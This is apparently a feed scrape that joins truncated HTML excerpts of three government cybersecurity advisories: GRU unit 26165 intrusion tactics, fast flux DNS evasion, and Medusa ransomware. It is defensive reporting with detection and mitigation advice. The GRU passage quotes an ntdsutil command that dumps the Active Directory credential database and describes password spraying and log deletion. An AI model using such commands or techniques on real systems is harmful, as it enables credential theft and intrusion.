title="T1586.003">T1586.003</a>]. The emails were typically written in the target’s native language and sent to a single targeted recipient.&nbsp;</p> <p>Some campaigns employed multi-stage redirectors [<a href="https://attack.mitre.org/versions/v17/techniques/T1104/" target="_blank" title="T1104">T1104</a>] verifying IP-geolocation [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627.001">T1627.001</a>] and browser fingerprints [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627">T1627</a>] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [<a href="https://attack.mitre.org/versions/v17/techniques/T1111/" target="_blank" title="T1111">T1111</a>] and CAPTCHA relaying capabilities [<a href="https://attack.mitre.org/versions/v17/techniques/T1056/" target="_blank" title="T1056">T1056</a>]. Connecting endpoints failing the location checks were redirected to a benign URL [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627">T1627</a>], such as msn.com. Redirector services used include:</p> <ul> <li>Webhook[.]site</li> <li>FrgeIO</li> <li>InfinityFree</li> <li>Dynu</li> <li>Mocky</li> <li>Pipedream</li> <li>Mockbin[.]org</li> </ul> <p>The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/002/" target="_blank" title="T1204.002">T1204.002</a>] delivered via third-party services and redirectors [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>], scripts in a mix of languages [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/" target="_blank" title="T1059">T1059</a>] (including BAT [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/003/" target="_blank" title="T1059.003">T1059.003</a>] and VBScript [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/005/" target="_blank" title="T1059.005">T1059.005</a>]) and links to hosted shortcuts [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/001/" target="_blank" title="T1204.001">T1204.001</a>].</p> <h3>CVE Usage</h3> <p>Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-23397" target="_blank" title="CVE-2023-23397">CVE-2023-23397</a>) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [<a href="https://d3fend.mitre.org/technique/d3f:EncryptedTunnels/" target="_blank" title="T1187">T1187</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited4" title="4">4</a>],[<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited5" title="5">5</a>] These actors also used a series of Roundcube CVEs (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12641" target="_blank" title="CVE-2020-12641">CVE-2020-12641</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35730" target="_blank" title="CVE-2020-35730">CVE-2020-35730</a>, and <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44026" target="_blank" title="CVE-2021-44026">CVE-2021-44026</a>) to execute arbitrary shell commands [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/005/" target="_blank" title="T1059">T1059</a>], gain access to victim email accounts, and retrieve sensitive data from email servers [<a href="https://attack.mitre.org/versions/v17/techniques/T1114/" target="_blank" title="T1114">T1114</a>].</p> <p>Since at least fall 2023, the actors leveraged a WinRAR vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" title="CVE-2023-38831">CVE-2023-38831</a>) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [<a href="https://attack.mitre.org/versions/v17/techniques/T1659/" target="_blank" title="T1659">T1659</a>]. The actors sent emails with malicious attachments [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a>] or embedded hyperlinks [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>] that downloaded a malicious archive prepared using this CVE.&nbsp;</p> <h3>Post-Compromise TTPs</h3> <p>After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [<a href="https://attack.mitre.org/versions/v17/techniques/T1589/002/" target="_blank" title="T1589.002">T1589.002</a>]. The actors also conducted reconnaissance of the cybersecurity department [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/" target="_blank" title="T1591">T1591</a>], individuals responsible for coordinating transport [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/004/" target="_blank" title="T1591.004">T1591.004</a>], and other companies cooperating with the victim entity [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/002/" target="_blank" title="T1591.002">T1591.002</a>].</p> <p>The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [<a href="https://attack.mitre.org/versions/v17/tactics/TA0008/" target="_blank" title="TA0008">TA0008</a>]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>] to access additional hosts and attempt to dump Active&nbsp;Directory NTDS.dit domain databases [<a href="https://attack.mitre.org/versions/v17/techniques/T1003/003/" target="_blank" title="T1003.003">T1003.003</a>] using native Active Directory Domain Services commands, such as in&nbsp;Figure 2: Example Active Directory Domain Services command:</p> <div> <p><code>C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit</code></p> </div> <p>Figure 2: Example Active Directory Domain Services command</p> <p>Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a>] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [<a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a>]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [<a href="https://attack.mitre.org/versions/v17/techniques/T1048/" target="_blank" title="T1048">T1048</a>].</p> <p>Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [<a href="https://attack.mitre.org/versions/v17/techniques/T1098/002/" target="_blank" title="T1098.002">T1098.002</a>] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited6" title="6">6</a>]</p> <p>After initial authentication, unit 26165 actors would change accounts' folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [<a href="https://attack.mitre.org/versions/v17/techniques/T1556/006/" target="_blank" title="T1556.006">T1556.006</a>]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [<a href="https://attack.mitre.org/versions/v17/techniques/T1552/006/" target="_blank" title="T1552.006">T1552.006</a>] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [<a href="https://attack.mitre.org/versions/v17/techniques/T1087/002/" target="_blank" title="T1087.002">T1087.002</a>] and conduct a brute force password spray [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/001/" target="_blank" title="T1070.001">T1070.001</a>].</p> <p>After gaining init Fast Flux: A National Security Threat https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-093a US-CERT Alerts urn:uuid:779616ff-495a-d97c-0d50-b880f7cb4083 Tue, 01 Apr 2025 19:00:21 +0000 <h2><strong>Executive summary</strong></h2> <p>Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult.&nbsp;</p> <p>The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux&nbsp;by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence.&nbsp;</p> <p>The authoring agencies recommend all stakeholders—government and providers—collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity.</p> <p>Download the PDF version of this report: <a href="https://media.defense.gov/2025/Apr/02/2003681172/-1/-1/0/CSA-FAST-FLUX.PDF">Fast Flux: A National Security Threat</a> (PDF, 841 KB).</p> <h2><strong>Technical details</strong></h2> <p>When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked.&nbsp;</p> <p>Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [<a href="https://attack.mitre.org/versions/v16/techniques/T1568/001/" target="_blank" title="Dynamic Resolution: Fast Flux DNS">T1568.001</a>].&nbsp;</p> <h3><strong>Single and double flux</strong></h3> <p>Malicious cyber actors use two common variants of fast flux to perform operations:</p> <p><strong>1. </strong>Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-04/Single%20flux%20technique.png?itok=pqu33cFW" width="1024" height="511" alt="Illustration of single flux technique, where a single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. "> </div> <figcaption class="c-figure__caption">Figure 1: Single flux technique.</figcaption> </figure> <p><strong>Note:</strong> This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers.</p> <p><strong>2. </strong>Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-04/Double%20flux%20technique.png?itok=0Cs4NL_u" width="1024" height="600" alt="Infographic of double flux technique, where In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. "> </div> <figcaption class="c-figure__caption">Figure 2: Double flux technique.&nbsp;</figcaption> </figure> <p>Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure. Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include:</p> <ul> <li>Bulletproof hosting (BPH) services offer Internet hosting that disregards or evades law enforcement requests and abuse notices. These providers host malicious content and activities while providing anonymity for malicious cyber actors. Some BPH companies also provide fast flux services, which help malicious cyber actors maintain connectivity and improve the reliability of their malicious infrastructure.&nbsp;[1] <ul> <li>Refer to ASD’s ACSC’s <a href="https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers" target="_blank" title="&quot;Bulletproof&quot; hosting providers Cracks in the armour of cybercriminal infrastructure">“Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure</a> for more information on BPH providers.&nbsp;[2]</li> </ul> </li> <li>Fast flux has been used in Hive and Nefilim ransomware attacks.&nbsp;[3], [4]</li> <li>Gamaredon uses fast flux to limit the effectiveness of IP blocking.&nbsp;[5], [6], [7]</li> </ul> <p>The key advantages of fast flux networks for malicious cyber actors include:</p> <ul> <li><strong>Increased resilience.</strong> As a fast flux network rapidly rotates through botnet devices, it is difficult for law enforcement or abuse notifications to process the changes quickly and disrupt their services.</li> <li><strong>Render IP blocking ineffective</strong>. The rapid turnover of IP addresses renders IP blocking irrelevant since each IP address is no longer in use by the time it is blocked. This allows criminals to maintain resilient operations.</li> <li><strong>Anonymity</strong>. Investigators face challenges in tracing malicious content back to the source through fast flux networks. This is because malicious cyber actors’ C2 botnets are constantly changing the associated IP addresses throughout the investigation.</li> </ul> <h3><strong>Additional malicious uses</strong></h3> <p>Fast flux is not only used for maintaining C2 communications, it also can play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities. Similarly, fast flux is&nbsp;used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts.&nbsp;</p> <p>Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum&nbsp;that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel&nbsp;(See Figure 3). A customer just needs to add a "dummy server interface," which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain "clean" and unblocked.&nbsp;</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-04/Example%20dark%20web%20fast%20flux%20advertisement.png?itok=NofSWyHu" width="775" height="70" alt="Example of a dark web fast flux advertisement."> </div> <figcaption class="c-figure__caption">Figure 3: Example dark web fast flux advertisement.</figcaption> </figure> <p>The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking.&nbsp;</p> <p>As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability.</p> <h2><strong>Detection techniques</strong></h2> <p>The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs (3.A)">CISA CPG 3.A</a>]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics.&nbsp;</p> <p><strong>1. </strong>Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions.</p> <p><strong>2. </strong>Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle though tens or hundreds of IP addresses per day.</p> <p><strong>3.</strong> Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes.</p> <p><strong>4.</strong> Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information.</p> <p><strong>5. </strong>Use flow data to identify large-scale communications with numerous different IP addresses over short periods.</p> <p><strong>6.</strong> Develop&nbsp;fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior.</p> <p><strong>7.</strong> Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts.</p> <p><strong>8. </strong>Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity.</p> <h2><strong>Mitigations</strong></h2> <h3>All organizations</h3> <p>To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics.&nbsp;</p> <p><strong>Note:</strong> Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service&nbsp;providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content.</p> <p><strong>1. </strong>DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses</p> <ul> <li>Block access to domains identified as using fast flux through non-routable DNS responses or firewall rules.</li> <li>Consider sinkholing the malicious domains, redirecting traffic from those domains to a controlled server to capture and analyze the traffic, helping to identify compromised hosts within the network.</li> <li>Block IP addresses known to be associated with malicious fast flux networks.</li> </ul> <p><strong>2.</strong> Reputational filtering of fast flux enabled malicious activity</p> <ul> <li>Block traffic to and from domains or IP addresses with poor reputations, especially ones identified as participating in malicious fast flux activity.</li> </ul> <p><strong>3. </strong>Enhanced monitoring and logging</p> <ul> <li>Increase logging and monitoring of DNS traffic and network communications to identify new or ongoing fast flux activities.</li> <li>Implement automated alerting mechanisms to respond swiftly to detected fast flux patterns.</li> <li>Refer to ASD’s ACSC joint publication, <a href="https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-monitoring/best-practices-event-logging-threat-detection" target="_blank" title="Best practices for event logging and threat detection">Best practices for event logging and threat detection</a>, for further logging recommendations.</li> </ul> <p><strong>4. </strong>Collaborative defense and information sharing</p> <ul> <li>Share detected fast flux indicators (e.g., domains, IP addresses) with trusted partners and threat intelligence communities to enhance collective defense efforts. Examples of indicator sharing initiatives include CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/automated-indicator-sharing-ais" title="Automated Indicator Sharing">Automated Indicator Sharing</a> or sector-based Information Sharing and Analysis Centers (ISACs) and ASD’s <a href="https://www.cyber.gov.au/about-us/view-all-content/news-and-media/join-the-cyber-threat-intelligence-sharing-service-through-sentinel" target="_blank" title="Cyber Threat Intelligence Sharing Platform">Cyber Threat Intelligence Sharing Platform</a> (CTIS) in Australia.</li> <li>Participate in public and private information-sharing programs to stay informed about emerging fast flux tactics, techniques, and procedures (TTPs). Regular collaboration is particularly important because most malicious activity by these domains occurs within just a few days of their initial use; therefore, early discovery and information sharing by the cybersecurity community is crucial to minimizing such malicious activity. [8]</li> </ul> <p><strong>5. </strong>Phishing awareness and training</p> <ul> <li>Implement employee awareness and training programs to help personnel identify and respond appropriately to phishing attempts.</li> <li>Develop policies and procedures to manage and contain phishing incidents, particularly those facilitated by fast flux networks.</li> <li>For more information on mitigating phishing, see joint <a href="https://www.cisa.gov/resources-tools/resources/phishing-guidance-stopping-attack-cycle-phase-one" title="Phishing Guidance: Stopping the Attack Cycle at Phase One">Phishing Guidance: Stopping the Attack Cycle at Phase One</a>.</li> </ul> <h3>Network defenders</h3> <p>The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment.&nbsp;</p> <p>However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat.&nbsp;</p> <p>For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about <a href="https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF" target="_blank" title="Selecting a Protective DNS Service">Selecting a Protective DNS Service</a>. [9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s <a href="https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/DIB-Cybersecurity-Services/" target="_blank" title="DIB Cybersecurity Services">DIB Cybersecurity Services</a> and <a href="https://www.nsa.gov/Portals/75/documents/Cybersecurity/CCC/DIB_Services_NOV2023.pdf" target="_blank" title="National Security Agency Cybersecurity Services">factsheet</a>. CISA also offers a Protective DNS service for federal civilian executive&nbsp;branch (FCEB) agencies. See CISA’s <a href="https://www.cisa.gov/resources-tools/services/protective-domain-name-system-resolver" target="_blank" title="Protective Domain Name System (DNS) Resolver">Protective Domain Name System Resolver</a> page and <a href="https://www.cisa.gov/sites/default/files/2024-08/Protective%20DNS%20Fact%20Sheet%20-%20August%202024.pdf" target="_blank" title="Protective Domain Name System Resolver Service Fact Sheet">factsheet </a>for more information.&nbsp;</p> <h2><strong>Conclusion</strong></h2> <p>Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats.&nbsp;</p> <p>The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization's cyber defenses.&nbsp;</p> <h2><strong>Works cited</strong></h2> <p>[1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. <a href="https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service" target="_blank" title="Bulletproof Hosting: A Critical Cybercriminal Service">https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service</a>&nbsp;</p> <p>[2] Australian Signals Directorate’s Australian Cyber Security Centre. "Bulletproof" hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025.&nbsp;<a href="https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers" target="_blank" title="&quot;Bulletproof&quot; hosting providers Cracks in the armour of cybercriminal infrastructure">https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers</a>&nbsp;</p> <p>[3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023.&nbsp;<a href="https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf" target="_blank" title="A Comprehensive Guide to Detect Ransomware">https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf</a></p> <p>[4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021.&nbsp;<a href="https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them" target="_blank" title="Modern Ransomware's Double Extortion Tactics and How to Protect Enterprises Against Them">https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them</a></p> <p>[5] Unit 42. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022.&nbsp;<a href="https://unit42.paloaltonetworks.com/trident-ursa/" target="_blank" title="Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine ">https://unit42.paloaltonetworks.com/trident-ursa/</a></p> <p>[6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024.&nbsp;<a href="https://www.recordedf #StopRansomware: Medusa Ransomware https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a US-CERT Alerts urn:uuid:c811c34d-f009-8c24-3b7a-2d2849e4d296 Tue, 11 Mar 2025 14:52:42 +0000 <h2><strong>Summary</strong></h2> <p><strong>Note:</strong> This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://www.cisa.gov/stopransomware" title="Stopransomware.gov">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</p> <p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.&nbsp;</p> <p>Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a" title="#StopRansomware: MedusaLocker">MedusaLocker</a> variant and the Medusa mobile malware variant per the FBI’s investigation.</p> <p>FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.</p> <p>Download the PDF version of this report:</p> <p>For a downloadable list of IOCs, see:</p> <a href="https://www.cisa.gov/sites/default/files/2025-03/AA25-071A.stix_.xml" class="c-file__link" target="_blank">AA25-071A STIX XML</a> <span class="c-file__size">(XML, 34.30 KB )</span> <a href="https://www.cisa.gov/sites/default/files/2025-03/AA25-071A-StopRansomware-Medusa-Ransomware.stix_.json" class="c-file__link" target="_blank">AA25-071A STIX JSON</a> <span class="c-file__size">(JSON, 42.28 KB )</span> <h3><strong>Technical Details</strong></h3> <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Background</h3> <p>The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.</p> <h3>Initial Access</h3> <p>Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [<a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a>] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:</p> <ul> <li><strong>Phishing campaigns</strong> as a primary method for stealing victim credentials&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a>].</li> <li><strong>Exploitation of unpatched software vulnerabilities [</strong><a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a><strong>]</strong> through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability&nbsp;<a href="https://www.cve.org/CVERecord?id=CVE-2024-1709" title="Authentication bypass using an alternate path or channel">CVE-2024-1709</a> [<a href="https://cwe.mitre.org/data/definitions/288.html" title="Authentication Bypass Using an Alternate Path or Channel">CWE-288: Authentication Bypass Using an Alternate Path or Channel</a>] and Fortinet EMS SQL injection vulnerability [<a href="https://www.cve.org/CVERecord?id=CVE-2023-48788" title="CVE-2023-48788">CVE-2023-48788</a> [<a href="https://cwe.mitre.org/data/definitions/89.html" title="Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE 89: SQL Injection</a>].</li> </ul> <h3>Discovery</h3> <p>Medusa actors use&nbsp;<a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">living off the land (LOTL)</a> and legitimate tools Advanced IP Scanner&nbsp;and SoftPerfect Network Scanner&nbsp;for initial user, system, and network enumeration.&nbsp;Once a foothold in a victim network is established, commonly scanned ports include:</p> <ul> <li><code>21</code> (FTP)</li> <li><code>22</code> (SSH)</li> <li><code>23</code> (Telnet)</li> <li><code>80</code> (HTTP)</li> <li><code>115</code> (SFTP)</li> <li><code>443</code> (HTTPS)</li> <li><code>1433</code> (SQL database)</li> <li><code>3050</code> (Firebird database)</li> <li><code>3128</code> (HTTP web proxy)</li> <li><code>3306</code> (MySQL database)</li> <li><code>3389</code> (RDP)</li> </ul> <p>Medusa actors primarily use PowerShell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] and the Windows Command Prompt (cmd.exe) [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] for network [<a href="https://attack.mitre.org/versions/v16/techniques/T1046/" title="Network Service Discovery">T1046</a>] and filesystem enumeration [<a href="https://attack.mitre.org/versions/v16/techniques/T1083/" title="File and Directory Discovery">T1083</a>] and to utilize Ingress Tool Transfer capabilities [<a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>]. Medusa actors use Windows Management Instrumentation (WMI) [<a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] for querying system 